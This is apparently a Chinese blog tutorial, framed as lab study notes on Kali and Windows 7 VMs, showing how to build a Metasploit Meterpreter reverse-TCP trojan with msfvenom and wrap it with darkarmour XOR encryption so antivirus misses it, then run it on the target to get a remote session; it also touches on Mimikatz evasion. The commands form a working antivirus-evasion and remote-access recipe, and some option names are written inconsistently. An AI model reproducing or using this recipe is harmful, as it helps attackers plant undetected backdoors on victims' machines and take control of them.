网安学习----利用darkarmour实现MSF的免杀

使用虚拟机:kali,win7

木马免杀(利用darkarmour实现MSF的免杀)

先看攻击机和目标机是不是一个网段,不在一个网段,就更改kali主机的IP地址

我这里是同一个网段的IP地址

1.安装环境

需要C语言编译器

安装环境

apt-get install mingw-w64-tools mingw-w64-commmon g++-mingw-w64 gcc-mingw-w64 upx-ucl osslsigncode

先输入apt-get install mingw-w64-tools(如果权限不是root,需要在前面加sudo)

在这里我遇到了一个问题,有没有满足的依赖关系

遇到这种情况,直接下载就可以,可以两个一起下载,这个分开下载会出错

 

下载完成之后就可以再尝试apt-get install mingw-w64-tools,成功了,然后直接输入我们要下载的全部就可以了,记得要把mingw-w64-tools也加上,如果不加上会无法定位

2.生成木马文件

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.100.128 LPORT=4444 -f exe -o run.exe

Msfvenom:有大量的攻击载荷,而msfvenom就是用于快速创建我们需要的攻击载荷并生成指定平台运行的程序,实际上msfvenom就是攻击载荷(payloads)和编码器(encoders)的组合工具,他是独立于msf控制台(msfconsole)之外的,无法在控制台内直接调用.

-p:指定需要使用的payload(攻击载荷)

-o:保存文件

LHOST和LPORT是攻击机的ip地址和端口

3.Msf加载免杀

先将工具放到目录下,然后用unzip进行解压,把解压出来的文件放到生成的木马同一级目录下,然后运行命令

./darkarmour.py -f run.exe --encrypt xor --jump -o cxy.exe -loop 5

 

--encrypty xor:异或加密算法,利用xor进行加密

--jmp:使用基于jmp的PE加载器

--loop 5:加密等级

4.进入msf打开监听

将木马文件放入目标机中

5.点击运行文件 

然后打开kali,看到进去了meterpreter模块中就可以了,尝试一些指令,没有问题就是成功了。

拓展:

Mimikatz的免杀

k:用于加密的密钥key,不设置就会默认随机生成

u:用upx打包可执行文件

  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值